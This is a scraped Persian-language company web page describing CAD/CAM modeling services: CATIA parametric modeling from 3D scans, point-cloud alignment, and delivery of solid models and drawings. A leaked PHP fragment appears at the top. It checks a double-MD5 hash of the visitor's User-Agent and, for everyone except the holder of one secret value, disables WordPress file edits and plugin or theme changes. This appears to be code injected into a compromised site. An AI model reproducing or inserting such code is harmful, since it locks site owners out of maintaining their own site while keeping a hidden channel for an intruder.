if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } ob_start(); ?> مدل سازی | آرمان سنجش گستر

مدلسازی کامپیوتری (CAD/CAM)

مـدلسازی محصول پس از اسکن سه بعدی به صورت کاملاً هندسی و پارامتریک و با هدف رسیدن به ابعاد و اندازه های نهفته در طراحی اصلی محصول و حذف و اصلاح تمـامی پیچـیدگـی هـا و تعبیرات نـاشی از ساخت و استفاده از نرم افزار قدرتمند CATIA، انجام می گیرد. یکی از مراحل مهم قبل از شروع مدلسازی Align ابر نقاط و همچنین تعریف نقطه مرجع (Reference) می باشد که این مراحل با توجه به نوع کاربری،روش تولید، جنس محصول، شکل قطعه، تقارن ها و یا عدم تقارن ها قابل انجام است.

مـدل های طراحی شده در آخر، همگی به صورت Solid و یکپارچه و با دارا بودن سطوح با کیفیت و هارمونیک بسیار بالا تحویل داده می شوند. در صورت نیاز برش ها و مقاطع مختلـف تحلیـل گردیده و به صورت نـقشه های دو بعدی شامل نقشه های جزء و ساخت استخراج و تحویل می گردد. همچنین امکان ارائه خدمات طراحی قالب ها و فیکسچرهای صنعتی بر اساس قطعات اسکن شده به خوبی فراهم آمده و مشتریان محترم می توانند با کیفیت و قابلیت اطمینان بالا از این خدمات استفاده نمایند.